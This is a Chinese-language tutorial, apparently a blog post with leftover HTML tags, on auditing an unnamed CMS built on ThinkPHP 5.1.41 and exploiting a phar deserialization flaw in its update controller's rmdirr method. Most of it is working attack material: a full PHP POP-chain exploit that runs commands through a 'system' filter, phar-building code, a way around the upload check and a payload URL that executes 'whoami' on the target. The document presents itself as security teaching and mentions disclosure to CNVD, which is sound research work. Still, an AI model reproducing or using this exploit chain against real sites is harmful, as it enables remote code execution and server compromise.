基于框架漏洞的代码审计实战教学文档<\/h1>

0x00 前言<\/h2>
本教学文档将详细讲解如何基于框架漏洞进行代码审计，重点分析ThinkPHP 5.1.41反序列化漏洞的发现和利用过程。文档包含漏洞环境介绍、反序列化入口寻找、phar文件生成、利用链构造、文件上传绕过以及最终漏洞验证等完整流程。<\/p>

0x01 环境介绍<\/h2>

目标：某开源CMS最新版<\/li>
框架：ThinkPHP 5.1.41（已知存在反序列化漏洞）<\/li>

漏洞已提交至CNVD<\/li> <\/ul>

0x02 技术栈分析<\/h2>

通过查看项目README.md文件获取技术栈信息：<\/p>

ThinkPHP版本：5.1.41<\/li> <\/ul>

0x03 反序列化入口寻找<\/h2>

常见反序列化触发点<\/h3>

unserialize()函数<\/strong><\/li>
phar反序列化<\/strong><\/li>

session反序列化<\/strong><\/li> <\/ol>
3.1 unserialize函数分析<\/h3>

全局搜索unserialize函数调用<\/li>
结合路由分析可访问性<\/li>
结论：无可用路由访问unserialize函数<\/li> <\/ul>
3.2 session反序列化分析<\/h3>

全局搜索session.serialize_handler<\/code><\/li>
结论：未发现相关配置<\/li> <\/ul> 3.3 phar反序列化分析<\/h3> 常见触发函数<\/strong>：<\/p> is_file()<\/li> is_dir()<\/li> file_exists()<\/li> file_get_contents()<\/li> file()<\/li> fopen()<\/li> unlink()<\/li> stat()<\/li> <\/ul> 漏洞发现<\/strong>：<\/p> 在update<\/code>控制器的rmdirr<\/code>方法中发现可利用点<\/li> 方法未限制前缀，允许使用phar协议<\/li> 后缀限制可通过特定方式绕过<\/li> <\/ul> 0x04 phar文件生成<\/h2> 4.1 配置要求<\/h3> 生成phar文件需要本地配置：<\/p> phar.readonly<\/span> =<\/span> Off<\/span> <\/span><\/span><\/code><\/pre>4.2 phar文件生成代码<\/h3> class<\/span> Demo<\/span>{ <\/span><\/span> \/\/ 反序列化利用对象 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>$phar =<\/span> new<\/span> \Phar<\/span>("phar.phar"<\/span>); <\/span><\/span>$phar-><\/span>startBuffering<\/span>(); <\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>); <\/span><\/span>$phar-><\/span>setMetadata<\/span>(new<\/span> Demo<\/span>()); \/\/ 设置要序列化的对象 <\/span><\/span><\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); <\/span><\/span>$phar-><\/span>stopBuffering<\/span>(); <\/span><\/span><\/code><\/pre>0x05 ThinkPHP 5.1.41反序列化利用链<\/h2> 5.1 利用链分析<\/h3> 完整利用链路径：<\/p> \thinkphp\library\think\process\pipes\Windows.php<\/code> -> __destruct()<\/code><\/li> \thinkphp\library\think\process\pipes\Windows.php<\/code> -> removeFiles()<\/code><\/li> Windows.php<\/code>: file_exists()<\/code><\/li> \thinkphp\library\think\model\concern\Conversion.php<\/code> -> __toString()<\/code><\/li> \thinkphp\library\think\model\concern\Conversion.php<\/code> -> toJson()<\/code><\/li> \thinkphp\library\think\model\concern\Conversion.php<\/code> -> toArray()<\/code><\/li> \thinkphp\library\think\Request.php<\/code> -> __call()<\/code><\/li> \thinkphp\library\think\Request.php<\/code> -> isAjax()<\/code><\/li> \thinkphp\library\think\Request.php<\/code> -> param()<\/code><\/li> \thinkphp\library\think\Request.php<\/code> -> input()<\/code><\/li> \thinkphp\library\think\Request.php<\/code> -> filterValue()<\/code><\/li> <\/ol> 5.2 EXP代码<\/h3> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think<\/span>; <\/span><\/span>abstract<\/span> class<\/span> Model<\/span> { <\/span><\/span> protected<\/span> $append =<\/span> []; <\/span><\/span> private<\/span> $data =<\/span> []; <\/span><\/span> function<\/span> __construct(){ <\/span><\/span> $this-><\/span>append<\/span> =<\/span> ["ethan"<\/span> =><\/span> ["dir"<\/span>, "calc"<\/span>]]; <\/span><\/span> $this-><\/span>data<\/span> =<\/span> ["ethan"<\/span> =><\/span> new<\/span> Request<\/span>()]; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>class<\/span> Request<\/span> { <\/span><\/span> protected<\/span> $hook =<\/span> []; <\/span><\/span> protected<\/span> $filter =<\/span> "system"<\/span>; <\/span><\/span> protected<\/span> $config =<\/span> [ <\/span><\/span> 'var_method'<\/span> =><\/span> '_method'<\/span>, <\/span><\/span> 'var_ajax'<\/span> =><\/span> '_ajax'<\/span>, <\/span><\/span> 'var_pjax'<\/span> =><\/span> '_pjax'<\/span>, <\/span><\/span> 'var_pathinfo'<\/span> =><\/span> 's'<\/span>, <\/span><\/span> 'pathinfo_fetch'<\/span> =><\/span> ['ORIG_PATH_INFO'<\/span>, 'REDIRECT_PATH_INFO'<\/span>, 'REDIRECT_URL'<\/span>], <\/span><\/span> 'default_filter'<\/span> =><\/span> ''<\/span>, <\/span><\/span> 'url_domain_root'<\/span> =><\/span> ''<\/span>, <\/span><\/span> 'https_agent_name'<\/span> =><\/span> ''<\/span>, <\/span><\/span> 'http_agent_ip'<\/span> =><\/span> 'HTTP_X_REAL_IP'<\/span>, <\/span><\/span> 'url_html_suffix'<\/span> =><\/span> 'html'<\/span>, <\/span><\/span> ]; <\/span><\/span> <\/span><\/span> function<\/span> __construct(){ <\/span><\/span> $this-><\/span>filter<\/span> =<\/span> "system"<\/span>; <\/span><\/span> $this-><\/span>config<\/span> =<\/span> ["var_ajax"<\/span> =><\/span> ''<\/span>]; <\/span><\/span> $this-><\/span>hook<\/span> =<\/span> ["visible"<\/span> =><\/span> [$this, "isAjax"<\/span>]]; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\process\pipes<\/span>; <\/span><\/span>use<\/span> think\model\concern\Conversion<\/span>; <\/span><\/span>use<\/span> think\model\Pivot<\/span>; <\/span><\/span>class<\/span> Windows<\/span> { <\/span><\/span> private<\/span> $files =<\/span> []; <\/span><\/span> public<\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [new<\/span> Pivot<\/span>()]; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model<\/span>; <\/span><\/span>use<\/span> think\Model<\/span>; <\/span><\/span>class<\/span> Pivot<\/span> extends<\/span> Model<\/span> { <\/span><\/span>} <\/span><\/span> <\/span><\/span>use<\/span> think\process\pipes\Windows<\/span>; <\/span><\/span>echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> Windows<\/span>())); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x06 Phar与ThinkPHP反序列化结合<\/h2> 完整phar生成代码：<\/p> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think<\/span>; <\/span><\/span>abstract<\/span> class<\/span> Model<\/span> { <\/span><\/span> \/\/ 同上 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>class<\/span> Request<\/span> { <\/span><\/span> \/\/ 同上 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\process\pipes<\/span>; <\/span><\/span>use<\/span> think\model\concern\Conversion<\/span>; <\/span><\/span>use<\/span> think\model\Pivot<\/span>; <\/span><\/span>class<\/span> Windows<\/span> { <\/span><\/span> private<\/span> $files =<\/span> []; <\/span><\/span> public<\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [new<\/span> Pivot<\/span>()]; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model<\/span>; <\/span><\/span>use<\/span> think\Model<\/span>; <\/span><\/span>class<\/span> Pivot<\/span> extends<\/span> Model<\/span> { <\/span><\/span>} <\/span><\/span> <\/span><\/span>use<\/span> think\process\pipes\Windows<\/span>; <\/span><\/span>$phar =<\/span> new<\/span> \Phar<\/span>("phar.phar"<\/span>); <\/span><\/span>$phar-><\/span>startBuffering<\/span>(); <\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>); <\/span><\/span>$phar-><\/span>setMetadata<\/span>(new<\/span> Windows<\/span>()); <\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); <\/span><\/span>$phar-><\/span>stopBuffering<\/span>(); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x07 Phar文件上传<\/h2> 7.1 Phar文件上传绕过<\/h3> phar文件可以是任意后缀（jpg\/png\/zip等）<\/li> 只需配合phar协议即可触发反序列化<\/li> <\/ul> 7.2 上传功能查找方法<\/h3> 黑盒测试<\/strong>：直接测试应用程序功能<\/li> 白盒测试<\/strong>：通过路由和代码审计寻找<\/li> <\/ol> 7.3 黑盒测试结果<\/h3> 发现图片上传功能<\/li> 直接上传phar.jpg失败（文件头检测）<\/li> 无法通过图片上传利用<\/li> <\/ul> 7.4 白盒测试结果<\/h3> 发现允许上传zip\/txt等文件<\/li> 上传phar.zip成功<\/li> 获取文件存储路径<\/li> <\/ul> 0x08 漏洞验证<\/h2> Payload构造<\/strong>：<\/p> http:\/\/127.0.0.1\/\/admin.php\/update\/rmdirr?dirname=phar:\/\/public\/upload\/images\/628259c295370.zip&id=whoami <\/code><\/pre> 0x09 总结<\/h2> 通过分析框架版本确定潜在漏洞<\/li> 系统性地寻找反序列化入口点<\/li> 优先考虑phar反序列化方式<\/li> 构造完整的利用链<\/li> 生成phar文件并绕过上传限制<\/li> 通过phar协议触发反序列化实现RCE<\/li> <\/ol> 关键点<\/strong>：<\/p> ThinkPHP 5.1.41反序列化利用链<\/li> phar文件格式和生成方法<\/li> 文件上传绕过技巧<\/li> phar协议的使用方式<\/li> 完整的漏洞验证流程<\/li> <\/ul>